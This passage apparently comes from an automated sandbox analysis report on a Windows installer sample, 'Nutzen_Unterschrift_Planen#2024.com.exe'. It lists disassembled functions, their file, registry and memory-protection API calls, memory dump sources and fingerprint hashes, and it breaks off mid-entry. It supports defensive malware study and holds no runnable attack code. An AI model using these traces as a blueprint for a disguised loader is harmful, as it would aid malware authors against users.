                                                              • Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C
                                                              • Part of subcall function 00405BDB: CharNextW.USER32(?,?,fareafvrgende\Djrve27.gud,?,00405C4F,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,75D53420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75D53420,00000000), ref: 00405BE9
                                                              • Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405BEE
                                                              • Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405C06
                                                            • lstrlenW.KERNEL32(fareafvrgende\Djrve27.gud,00000000,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,75D53420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75D53420,00000000), ref: 00405C91
                                                            • GetFileAttributesW.KERNELBASE(fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,00000000,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,75D53420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75D53420), ref: 00405CA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                            • String ID: fareafvrgende\Djrve27.gud
                                                            • API String ID: 3248276644-3469630132
                                                            • Opcode ID: 2fc0a06e40463135d25c9bc8da77120e69662948dae603a13584a31230773222
                                                            • Instruction ID: 07588a96ba491492048338639ced47dd8f75e02a3aa2c86f807570fea5ede87b
                                                            • Opcode Fuzzy Hash: 2fc0a06e40463135d25c9bc8da77120e69662948dae603a13584a31230773222
                                                            • Instruction Fuzzy Hash: 3FF0D125008F1115E72233361D49EAF2664CE96360B1A023FF952B12D1DB3C99939C6E
                                                            Function 0040612D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 692 40612d-40615f call 4060cc 695 406161-40618f RegQueryValueExW RegCloseKey 692->695 696 40619d 692->696 695->696 697 406191-406195 695->697 698 4061a1-4061a3 696->698 697->698 699 406197-40619b 697->699 699->696 699->698
                                                            APIs
                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,007A0F00,00000000,?,?,Call,?,?,004063A1,80000002), ref: 00406173
                                                            • RegCloseKey.KERNELBASE(?,?,004063A1,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F00), ref: 0040617E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue
                                                            • String ID: Call
                                                            • API String ID: 3356406503-1824292864
                                                            • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                            • Instruction ID: 844fa4e459781eb8e351c6656b051d01f86af1f9d8b6039d3a5e8c643dc5dfc4
                                                            • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                            • Instruction Fuzzy Hash: E1015A72500209EAEF218F51CD0AEDB3BA8EF54360F01803AF91AA6191D778D964CBA4
                                                            Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316860454531.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.316860422171.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.316860484299.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.316860509538.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: EnumErrorLastWindows
                                                            • String ID:
                                                            • API String ID: 14984897-0
                                                            • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                            • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                            • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                            • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                            • Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
                                                            • Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                            • Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D
                                                            Function 00406639 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406666
                                                              • Part of subcall function 004065C9: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
                                                              • Part of subcall function 004065C9: wsprintfW.USER32 ref: 0040661B
                                                              • Part of subcall function 004065C9: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040662F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                            • String ID:
                                                            • API String ID: 2547128583-0
                                                            • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                            • Instruction ID: 7f6190fd0785004a6ee8fc72a27bac991e5bdadb2fb285410322192917ba6648
                                                            • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                            • Instruction Fuzzy Hash: AFE02C322042016AC2009A30AE40C3B33A89A88310303883FFA02F2081EB398C31AAAD
                                                            Function 00405D51 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCreate
                                                            • String ID:
                                                            • API String ID: 415043291-0
                                                            • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                            • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                            • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                            • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                            Function 0040580F Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403343,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75D53420,0040359C,?,00000006,00000008,0000000A), ref: 00405815
                                                            • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405823
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID:
                                                            • API String ID: 1375471231-0
                                                            • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                            • Instruction ID: 364d0df367319b35fd7f444a265edab083d6b2b9b53b3b0e5bc7a719fbea1b4c
                                                            • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                            • Instruction Fuzzy Hash: 29C08C312105019AC7002F20EF08B173E50AB20380F058839E546E00E0CE348064D96D
                                                            Function 00405DD4 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403305,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405DE8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                            • Instruction ID: b9e836fab2427aaa168680a15f0f0ce7fefe47de654f12bfd99ea101fd6ea48b
                                                            • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                            • Instruction Fuzzy Hash: 7DE0EC3222425EABDF509E559C04EEB7B6DEF05360F048837FD15E7160D631E921ABA8
                                                            Function 00405E03 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032BB,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E17
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                            • Instruction ID: c8204e3b8f5822b3fc4a752f4075b10d4d5d267c9e9767057f3313d1a75d1f26
                                                            • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                            • Instruction Fuzzy Hash: 38E0E632510559ABDF116F55DC00AEB775CFB05360F004436FD55E7150D671E9219BE4
                                                            Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316860454531.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.316860422171.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.316860484299.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.316860509538.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                            • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                            • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                            • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                            Function 004060CC Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F00,?,?,0040615A,007A0F00,00000000,?,?,Call,?), ref: 004060F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                            • Instruction ID: ced63528db1e32a5bcf3a8a8acf2bd7baad3650648e26365f6afbd74657f9209
                                                            • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                            • Instruction Fuzzy Hash: BED0123208020DBBDF219F909D01FAB375DAB04354F018436FE06E4190DB76D570AB14
                                                            Function 00404240 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404252
                                                            Memory Dump Source
